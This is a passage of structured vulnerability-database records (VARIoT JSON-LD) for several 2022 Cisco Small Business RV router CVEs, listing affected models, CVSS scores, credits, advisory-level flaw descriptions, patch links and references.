            "date": "2023-11-07T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-20702"
          },
          {
            "date": "2023-05-11T09:08:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-004938"
          },
          {
            "date": "2022-02-28T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202202-163"
          },
          {
            "date": "2024-11-21T06:43:21.797000",
            "db": "NVD",
            "id": "CVE-2022-20702"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-163"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Series router out-of-bounds write vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004938"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-163"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202202-0329

    Vulnerability from variot - Updated: 2024-11-23 22:04

    Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability.Information may be obtained and information may be tampered with. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Cisco RV340 routers. User interaction is required to exploit this vulnerability in that an administrator must perform a firmware update on the device.The specific flaw exists within the downloading of firmware files via HTTPS. The issue results from the lack of proper validation of the certificate presented by the server. An attacker can leverage this vulnerability to execute code in the context of root

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202202-0329",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv160w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv160",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv345",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv340",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv260w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv340w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv260",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv260p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv345p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv260 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260p vpn router with poe",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345p dual wan gigabit poe vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340w dual wan gigabit wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340",
            "scope": null,
            "trust": 0.7,
            "vendor": "cisco",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004937"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20704"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Gaurav Baruah",
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-413"
          }
        ],
        "trust": 0.7
      },
      "cve": "CVE-2022-20704",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 5.8,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "id": "CVE-2022-20704",
                "impactScore": 4.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.9,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.8,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 2.2,
                "id": "CVE-2022-20704",
                "impactScore": 2.5,
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "ykramarz@cisco.com",
                "availabilityImpact": "HIGH",
                "baseScore": 10.0,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2022-20704",
                "impactScore": 6.0,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "High",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 4.8,
                "baseSeverity": "Medium",
                "confidentialityImpact": "Low",
                "exploitabilityScore": null,
                "id": "CVE-2022-20704",
                "impactScore": null,
                "integrityImpact": "Low",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
                "version": "3.0"
              },
              {
                "attackComplexity": "HIGH",
                "attackVector": "ADJACENT",
                "author": "ZDI",
                "availabilityImpact": "HIGH",
                "baseScore": 7.1,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2022-20704",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 0.7,
                "userInteraction": "REQUIRED",
                "vectorString": "AV:A/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2022-20704",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2022-20704",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2022-20704",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "ZDI",
                "id": "CVE-2022-20704",
                "trust": 0.7,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202202-165",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULMON",
                "id": "CVE-2022-20704",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20704"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004937"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-165"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20704"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20704"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability.Information may be obtained and information may be tampered with. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Cisco RV340 routers. User interaction is required to exploit this vulnerability in that an administrator must perform a firmware update on the device.The specific flaw exists within the downloading of firmware files via HTTPS. The issue results from the lack of proper validation of the certificate presented by the server. An attacker can leverage this vulnerability to execute code in the context of root",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-20704"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004937"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20704"
          }
        ],
        "trust": 2.34
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2022-20704",
            "trust": 4.0
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-413",
            "trust": 2.4
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004937",
            "trust": 0.8
          },
          {
            "db": "ZDI_CAN",
            "id": "ZDI-CAN-15810",
            "trust": 0.7
          },
          {
            "db": "CS-HELP",
            "id": "SB2022020301",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-165",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20704",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20704"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004937"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-165"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20704"
          }
        ]
      },
      "id": "VAR-202202-0329",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.18174963
      },
      "last_update_date": "2024-11-23T22:04:59.396000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-smb-mult-vuln-KA9PK6D",
            "trust": 0.8,
            "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "Cisco has issued an update to correct this vulnerability.",
            "trust": 0.7,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "Cisco Small Business Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=183258"
          },
          {
            "title": "Cisco: Cisco Small Business RV Series Routers Vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "CVE-2022-XXXX",
            "trust": 0.1,
            "url": "https://github.com/AlphabugX/CVE-2022-23305 "
          },
          {
            "title": "CVE-2022-XXXX",
            "trust": 0.1,
            "url": "https://github.com/AlphabugX/CVE-2022-RCE "
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20704"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004937"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-165"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-787",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-121",
            "trust": 1.0
          },
          {
            "problemtype": "Out-of-bounds writing (CWE-787) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004937"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20704"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.4,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d"
          },
          {
            "trust": 1.8,
            "url": "https://www.zerodayinitiative.com/advisories/zdi-22-413/"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-20704"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2022020301"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/787.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/alphabugx/cve-2022-23305"
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20704"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004937"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-165"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20704"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20704"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004937"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-165"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20704"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-02-22T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "date": "2022-02-10T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-20704"
          },
          {
            "date": "2023-05-11T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-004937"
          },
          {
            "date": "2022-02-03T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202202-165"
          },
          {
            "date": "2022-02-10T18:15:09.253000",
            "db": "NVD",
            "id": "CVE-2022-20704"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-02-22T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "date": "2023-11-07T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-20704"
          },
          {
            "date": "2023-05-11T09:08:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-004937"
          },
          {
            "date": "2022-02-25T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202202-165"
          },
          {
            "date": "2024-11-21T06:43:22.110000",
            "db": "NVD",
            "id": "CVE-2022-20704"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-165"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Series router out-of-bounds write vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004937"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-165"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202202-0321

    Vulnerability from variot - Updated: 2024-11-23 22:04

    Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco RV340 routers. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of firmware updates. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202202-0321",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv160w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv160",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv345",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv340",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv260w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv340w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv260",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv260p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv345p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv340 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260p vpn router with poe",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345p dual wan gigabit poe vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340w dual wan gigabit wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340",
            "scope": null,
            "trust": 0.7,
            "vendor": "cisco",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-418"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004816"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20706"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "trichimtrich and nyancat0131",
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-418"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-167"
          }
        ],
        "trust": 1.3
      },
      "cve": "CVE-2022-20706",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.3,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2022-20706",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.9,
